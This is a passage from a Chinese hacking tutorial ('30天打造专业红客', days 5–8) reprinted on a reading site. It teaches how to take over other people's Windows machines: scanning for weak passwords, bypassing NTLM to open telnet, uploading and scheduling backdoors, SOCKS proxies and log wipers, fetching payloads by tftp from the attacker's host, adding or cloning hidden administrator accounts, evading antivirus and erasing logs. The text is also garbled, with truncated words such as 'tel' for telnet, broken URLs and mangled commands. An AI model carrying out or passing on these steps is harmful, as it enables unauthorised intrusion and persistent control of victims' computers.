友情提示:如果本网页打开太慢或显示不完整,请尝试鼠标右键“刷新”本网页!
30天打造专业红客-第3部分
快捷操作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 Enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完,想下次继续接着阅读,可使用上方 "收藏到我的浏览器" 功能 和 "加入书签" 功能!
stop tel 系统告诉你并没有启动tel,不理它,继续:
start tel 这次真的启动了tel,我们可以在另开的命令提示符窗口tel到对方的
23端口,验证身份,输入我们的guest账号和密码,它就真正成为我们的跳板了。我们可以利用它到其它的主机去。
三、扫除脚印:
删除为。exe 创建的快捷方式,删除winntsystem32logfiles下边的日志文件
'第5天'从简单的网络命令讲起
有个朋友问了我个问题:端口映射是什么意思??
其实很简单的,采用端口映射(Port Mapping)的方法,可以实现从Inter到局域网内部机器的特定端口服务的访问。例如,你所使用的机子处于一个连接到Inter的局域网内,你在机子上所开的所有服务(如FTP),默认情况下外界是访问不了的。这是因为你机子的IP是局域网内部IP,而外界能访问的只有你所连接的服务器的IP,由于整个局域网在Inter上只有一个真正的IP地址,而这个IP地址是属于局域网中服务器独有的。所以,外部的Inter登录时只可以找到局域网中的服务器,那你提供的服务当然是不起作用的。
所以解决这个问题的方法就是采用PM了。
有篇文章不错。大家看看:http://。pconline。。cn/pcedu/soft/lan/jywgl/10301/127157。html
继续讲,昨天有人说我找到个肉鸡,但不会用远程控制软件。先说用什么好呢
我推荐Remote Administrator,有篇介绍它的文章很好:http://。pcworld。。cn/2002/back_issues/2205/0533e。asp
下载:http://。skycn。/soft/15592。html
我想里面的说明你应该能很好理解的
现在我以一个例子来说一下怎么获得一个肉鸡,虽然前面一直在说,但好象有点乱的,下面说的这个有点投机取巧的感觉,至少我这样觉得,不过因为很多朋友说都5天了,我什么都没搞到啊,所以只能。。
第一步:扫描弱口令
这里我用20cn开发的scanipc (这http://down。yqdown。/xdown/yqdown0316/scanipc。rar有下的)
不一会就会扫到很多有弱口令的主机
(你可以拿你们学校的IP试试)
这里我用opentel(远程启动TEL的小东西,这里下:http://。infosw。/down/software。asp?id=1520)给扫描到开了空口令的主机开个端口让我们tel连接上去
;开了23端口,并可以连接上的主机就不用进行次步骤了!
Opentel使用方法:
OpenTel。exe server
列如:
C:》OpenTel。exe 192。168。1。2 administrator 123456 1 90 用户名:administrator 密码:123456
NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90
运行完,如果屏幕上出现 Disconnecting server。。。Successfully! 就说明已经成功。
这样,我们就能够得到一个开90端口的Tel服务器了。
Tel 192。168。1。2 90
这样就可以登录上去了。
第三步:配置并安装后门程序
这里我选择WinShell(小巧精干我喜欢下载:http://。hktk。/soft/soft_server/winshell。html),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上!
列如:
c:》ftp
ftp》open。cnwill。
然后输入用户名字 密码把后门传上去mput c:cnwill。exe
现在我们登陆到肉鸡上 Tel 192。168。1。2 90
把刚上传的后门程序下载并运行(别忘记删除 后门程序)
『后门也可以用命令完成』
user 192。168。1。2 90ipc 〃〃 /user:〃administrator〃
' 建 立 IPC 连 接 '
copy d:zilong。exe 192。168。1。2 90adminsystem32
' 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里'
copy d:long。exe 192。168。1。2 90adminsystem32
'上 传 一 个 删 除 日 志 程 序 到 对 方 的 主 机 里'
copy d:scoks。exe 192。168。1。2 90adminsystem32
' 上 传 一 个 SCOKS 代 理 程 序 到 对 方 的 主 机 里'
copy d:zilong。reg 192。168。1。2 90adminsystem32
'上 传 导 入 注 册 表的 REG 文 件 到 对 方 的 主 机 里'请看后门说明
time 192。168。1。2 90
' 得 到 对 方 主 机 的 当 前 时 间'
at 192。168。1。2 90 13:20 zilong。exe
'用 a t命 令 执 行 我 们 的 后 门 程 序' 别 把 时 间 搞 错 了 哦
==============
如果大家用不习惯命令的话;那就用流光的IPC种植者吧;简单易用。这里就不赘述啦
=============
tel 192。168。1。2 90
' 从 我 们 设 置 的 后 门 程 序 登 陆 主 机 '
user **** /add
'近来后添加一个用户名再说或者也可以选择激活guest'
localgroup administrators **** /add
' 把 自 己 添 加 到 管 理 组 里;这 样 我 们 就 是 超 级 管 理 员 了'
regedit /s c:winntsystem32zilong。reg
' 把 后 门 程 序 导 入 注 册 表 的 启 动 项'这样做是防止被别人停止我们
的后门服务程序;就算我们的后门服务程序被停止了;在主机重启动后我们的后门
服务就又继续运行了。
SOCKS …install
' 开 始 安 装 socks 代 理'
SCOKS …config starttype 2
' 使 SOCKS 代 理 程 序 自 动 运 行,不 怕 肉 鸡 再 重 启 了'
socks …config port 1080
' socks 代 理 端 口 设 置 为 1080 '
start skserver
' 启 动 SOCKS 代 理 服 务 '可以打开QQ设置IP代理了
long
' 刚 才 上 传 的 一 个 删 除 日 志 程 序;运 行 它 就 可 以 了'
'第6天'从tel讲起
先说tel;什么是tel?Tel服务虽然也属于客户机/服务器模型的服务,但它更大的意义在于实现了基于Tel协议的远程登录(远程交互式计算),那么什么是远程登录?
我想这个大家都明白一点;定义:远程登陆是指用户使用Tel命令,使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器,它只负责把用户输入的每个字符传递给主机,再将主机输出的每个信息回显在屏幕上。
使用Tel协议进行远程登陆时需要满足以下条件:在本的计算机上必须装有包含Tel协议的客户程序;必须知道远程主机的Ip地址或域名;必须知道登录标识与口令。
Tel远程登录服务分为以下4个过程:
1)本地与远程主机建立连接。该过程实际上是建立一个TCP连接,用户必须知道远程主机的Ip地址或域名;
2)将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT( Virtual Terminal)格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据报;
3)将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端,包括输入命令回显和命令执行结果;
4)最后,本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。
再说一下什么叫Tel协议?简单点说Tel协议是TCP/IP协议族中的一员,是Inter远程登陆服务的标准协议。应用Tel协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。它提供了三种基本服务:
1)Tel定义一个网络虚拟终端为远的系统提供一个标准接口。客户机程序不必详细了解远的系统,他们只需构造使用标准接口的程序;
2)Tel包括一个允许客户机和服务器协商选项的机制,而且它还提供一组标准选项;
3)Tel对称处理连接的两端,即Tel不强迫客户机从键盘输入,也不强迫客户机在屏幕上显示输出。
关于这个就说这么多了;至于其他的一些就不说了;因为没什么帮助对我门;如果你有兴趣;可以去本站查查相关资料
再说说Win2000的Tel服务;因为大部分服务器用的都是2000的
Win2000为我们提供了Tel客户机和服务器程序:Tel。exe是客户机程序(Client),tlntsvr。exe是服务器程序(server),同时它还为我们提供了Tel服务器管理程序tlntadmn。exe。 其实从应用层面上,Win2000的Tel服务并没有什么可说的,绝大部分内容你都可以从HELP文件中得到,我在此只是把它稍微整理一下而已。Windows 2000 默认安装了 Tel 服务,但是并没有默认启动。下面给出HELP文件中 Tel 服务的一部分默认设置:
AllowTrustedDomain:是否允许域用户访问。默认值是1,允许信任域用户访问。可以改为0: 不允许域用户访问(只允许本地用户)。
DefaultDomain:可以对与该计算机具有信任关系的任何域设置。默认值是〃。〃。
DefaultShell:显示 shell 安装的路径位置。默认值是: %systemroot%System32Cmd。exe /q /k
MaxFailedLogins:在连接终止之前显示尝试登录失败的最大次数。默认是3。
LoginScript:显示 Tel 服务器登录脚本的路径位置。默认的位置就是“%systemroot%System32login。cmd”,你可以更改脚本内容,这样登录进Tel的欢迎屏幕就不一样了。
NTLM:NTLM身份验证选项。默认是2。可以有下面这些值:
0: 不使用 NTLM 身份验证。
1: 先尝试 NTLM 身份验证,如果失败,再使用用户名和密码。
2: 只使用 NTLM 身份验证。
TelPort:显示 tel 服务器侦听 tel 请求的端口。默认是:23。你也可以更改为其他端口。
以上各项设置你可以使用tlntadmn。exe(Tel服务器管理程序)来进行非常方便的配置,配置后需要重新启动Tel服务。如图1
2 NTLM
提到了tel就不能不提NTLM,我想这也是让入侵者最为头痛的一件事,哪怕你获得了管理员帐号和密码,想简单通过NTLM也并非易事,况且win2000中的tel默认仅以NTLM方式验证身份,这就让我们不得不关注NTLM这个东东,那么什么是NTLM呢?
早期的SMB协议在网络上明文传输口令,后来出现了〃LAN Manager Challenge/Response〃验证机制,简称LM,它十分简单以至很容易被破解,微软随后提出了WindowsNT挑战/响应验证机制,即NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。NTLM工作流程是这样的:
1、客户端首先在本地加密当前用户的密码成为密码散列
2、客户端向服务器发送自己的帐号,这个帐号是没有经过加密的,明文直接传输
3、服务器产生一个16位的随机数字发送给客户端,作为一个 challenge(挑战)
4、客户端再用加密后的密码散列来加密这个 challenge ,然后把这个返回给服务器。作为 response(响应)
5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西,发送域控制器
6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列,然后使用这个密码散列来加密 challenge。
7、域控制器比较两次加密的 challenge ,如果一样,那么认证成功。
从上面的过程我们可以看出,NTLM是以当前用户的身份向Tel服务器发送登录请求的,而不是用你扫到的对方管理员的帐户和密码登录,显然,你的登录将会失败。举个例子来说,你家的机器名为A(本地机器),你入侵的机器名为B(远地机器),你在A上的帐户是xinxin,密码是1234,你扫到B的管理员帐号是Administrator,密码是5678,当你想Tel到B时,NTLM将自动以当前用户的帐号和密码作为登录的凭据来进行上面的7项操作,即用xinxin和1234,而并非用你扫到的Administrator和5678,且这些都是自动完成的,根本不给你插手的机会,因此你的登录操作将失败。
由于Tel服务器对NTLM的使用有3个选项,所以当你Tel远地机器时,会显示下面情况中的一种:
1)身份验证选项=0时
=====================================
Microsoft (R) Windows (TM) Version 5。00 (Build 2195)
Wele to Microsoft Tel Service
Tel Server Build 5。00。99201。1
login:
password:
为0时不使用NTML身份验证,直接输入用户名和密码,比如你可以输入扫到的Administrator和5678
2)身份验证选项=1时
=====================================
NTLM Authentication failed due to insufficient credentials。 Please login withclear text username and password
Microsoft (R) Windows (TM) Version 5。00 (Build 2195)
Wele to Microsoft Tel Service
Tel Server Build 5。00。99201。1
login:
password:
先尝试 NTLM 身份验证,如果失败,再使用用户名和密码,其实这种方式对于我们来说,与上一种方式没什么区别
3)身份验证选项=2时
=====================================
NTLM Authentication failed due to insufficient credentials。 Please login withclear text username and password
Server allows NTLM authentication only
Server has closed connection
遗失对主机的连接。
C:》
仔细看看上面的显示,根本没有给你输入用户名和密码的机会,直接断开连接,扫到了密码也是白扫
所以对于入侵者来说,NTLM是横在我们面前的一座大山,必须要除掉它,一般我们有如下几种方法:
1通过修改远程注册表更改tel服务器配置,将验证方式从2改为1或0;
2使用NTLM。exe,上传后直接运行,可将tel服务器验证方式从2改为1;
3在本地建立扫描到的用户,以此用户身份开启tel客户机并进行远程登录;
4使用软件,比如opentel。exe(需要管理员权限且开启IPC管道)
5使用脚本,如RTCS,(需要管理员权限但不依赖IPC管道)
基本上是以上的5种,其中后两种是我们比较常用的开tel的手法,而且使用方法十分简单,命令如下:
OpenTel。exe server username password NTLMAuthor telport
OpenTel。exe 服务器地址 管理员用户名 密码 验证方式(填0或1) tel端口
cscript RTCS。vbe targetIP username password NTLMAuthor telport
cscript RTCS。vbe
那tel上去后不知道该做什么了?很多朋友这样问了;我想如果你是从第1天看的;应该知道吧;我就再说说吧
1 查看系统信息
呵呵,其实就是随处看看,看看他的系统配置和版本(用type c:boot。ini来知道pro版或server版),看看都装了什么服务或软件(从目录名就可以知道了),看看有什么重要或有趣的文件啦(唉,要是国外的机器,看也看不懂),看看他的用户情况,总之就是尽可能多的了解系统,为一会装后门摸底。
2 使用tftp传送文件
想必大家都遇到过在tel中传输文件的问题,因为我们习惯了在ipc管道中的文件传输,所以有些朋友喜欢用 share ipc 来打开管道,进而利用copy来传输文件。不过这样反而麻烦,既然我们已经得到了shell(这个前面已经很详细的说过了)们可以用TFPT命令来完成这一切,什么是TFTP呢?
用TFTP(Trivial File Transfer Protocol)来实现文件的传送是一种基于UDP连接的文件传输,一般是使用Windows自带的tftp。exe和一个TFTP服务器端软件构成一个完整的传输结构。它是这样使用的: 首先运行本地的TFTP Server(比如tftpd32。exe)软件并保证始终开启直至传输全部完成, 然后在tel中(当然你也可以在其他shell中)运行下面的命令:
C:》tftp –i ip get xinxin。exe c:abcxinxin。exe
其中ip为你自己机器的ip,且上传文件要与TFTP服务器端在同一目录下,这样你就可以把xinxin。exe上传到c盘abc目录下了(其实是从tftp服务器下载来的)
需要指出的是,如果使用代理IP,你将不能实现与外部网络的文件传送。因为你的代理网关在进行数据封装的时候会将自己的IP地址加入到你的数据报中,代替你的内部网络地址,所以在外部网络进行MAC寻址时是找不到你这台TFTP服务器的。
3 安置后门
如果你入侵还有其他目的,比如以破坏为主,或者是来修改主页的,那么这些事情当然可以在安置后门之前做;如果你只是想得到一只肉鸡,那就没什么可说的了,安后门吧
这个问题我在前面有讲过一点;但不详细。用的后门一般有:木马,asp木马,远程控制软件,克隆帐户,建立并隐藏帐户,tel,tel扩展的shell,终端服务等。安置一个好的后门通常要注意以下几点:(这是一个前辈写的我copy一下;很中肯的)
1 不会被防火墙查杀及阻碍通信:被加入病毒库的后门最好加壳以逃过防火墙,尽量用低端口通信,以免被防火墙屏蔽。
2 最大限度增加隐蔽性:如果你选择远程控制软件,要注意被控端的安装提示和小图标,以及是否同步画面;如果你在帐户上做文章,要尽量保持在cmd和用户管理中都不出破绽;如果你选择放木马或tel扩展,要注意文件和进程的隐藏;如果新开了终端服务(入侵前并没有开),一定要该掉3389这个显眼的端口,且越低越好。
不要当管理员不存在:这是一个大忌,许多朋友在只有默认帐户的机器上建立类似'hacking'的管理员帐户,真是无知者无畏呀。所以安置后门的时候,想想管理员疏忽的地方会在哪里。
4 打补丁
如果想独霸肉鸡,就要会打补丁,要知道对肉鸡的竞争是很激烈的。怎么打补丁呢?这个也要问?想想你是怎么进来的吧。算了,提示一下,除了修补大的漏洞以外(上传官方补丁并运行),也要注意它的共享,ipc共享(最好都关闭),可疑端口,容易被利用的服务等。不过打补丁也要注意隐蔽性的,不要让管理员发现大的改动。
5 清除日志
可以手动或利用软件,如果不太会就去找相关教材吧,在这里我不详细介绍了。(上一篇我讲过一点)
好了;基本上就这么多了;今天就到这了;希望能给大家一些帮助
'第7天'继续讲,从克隆帐号 讲起
前2天基本的一些东西都讲过了,今天我觉得得把克隆帐号这个问题讲清楚了
什么叫克隆帐号 ?
前辈说:在注册表中有两处保存了帐号的SID相对标志符;一处是SAMDomainsAccount Users下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询还是原来状态的情况 。即所谓的克隆帐号。(我想这个很明白的,如果还有这个问题,你去网络技术版块问吧)
说到克垄帐号就得说说SAM安全帐号管理器,详细的我就不重复了,因为呢多前辈写了很多很棒的文章,大家有兴趣就看看:http://。91one。/dvbbs/dispbbs。asp?boardid=17&id=1427
明白原理后就可以手动或者用现成的工具克隆帐号,用什么呢?
克隆ca。exe 下载(找了许久 啊)http://。hejie。/xz/list。asp?id=926
注意手动克隆需要SYSTEM权限(这句话大家应该能明白吧)
用什么呢?psu。exe
还是很棒的,下载:。sometips。/soft/psu。exe
'第8天'从回答一个朋友的问题说起
有个朋友发了短信给我问怎么判断对方主机的操作系统呢?今天我们就先说说这个问题。我先从最简单的PING看主机操作系统说起
一、用ping来识别操作系统
C:》ping 10。1。1。2
Pinging 10。1。1。2 with 32 bytes of data:
Reply from 10。1。1。2: bytes=32 time
快捷操作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 Enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部!
温馨提示: 温看小说的同时发表评论,说出自己的看法和其它小伙伴们分享也不错哦!发表书评还可以获得积分和经验奖励,认真写原创书评 被采纳为精评可以获得大量金币、积分和经验奖励哦!